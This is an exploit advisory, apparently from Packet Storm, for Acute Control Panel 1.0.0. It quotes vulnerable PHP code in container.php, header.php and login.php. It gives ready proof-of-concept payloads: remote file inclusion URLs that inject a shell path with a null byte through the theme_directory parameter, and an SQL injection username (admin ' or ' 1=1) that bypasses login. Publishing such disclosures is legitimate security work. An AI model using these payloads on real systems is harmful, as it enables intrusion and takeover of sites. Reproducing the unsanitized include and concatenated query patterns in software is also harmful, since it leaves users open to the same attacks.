Acute Control Panel version 1.0.0 suffers from remote file inclusion and SQL injection vulnerabilities that allow for authentication bypass.
d4f0665235428efebf424f90a99c4376ebe15e8c2d9de65047b14b6ab0c57bd6###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################
[+] Remote File Inclusion
Vulnerable code in container.php
-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------
PoC :
http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerable code in header.php
--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------
PoC :
http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] SQL Injection (Auth Bypass)
Vulnerable code in login.php
--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------
PoC :
Username : admin ' or ' 1=1
Password : anything or nothing
################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed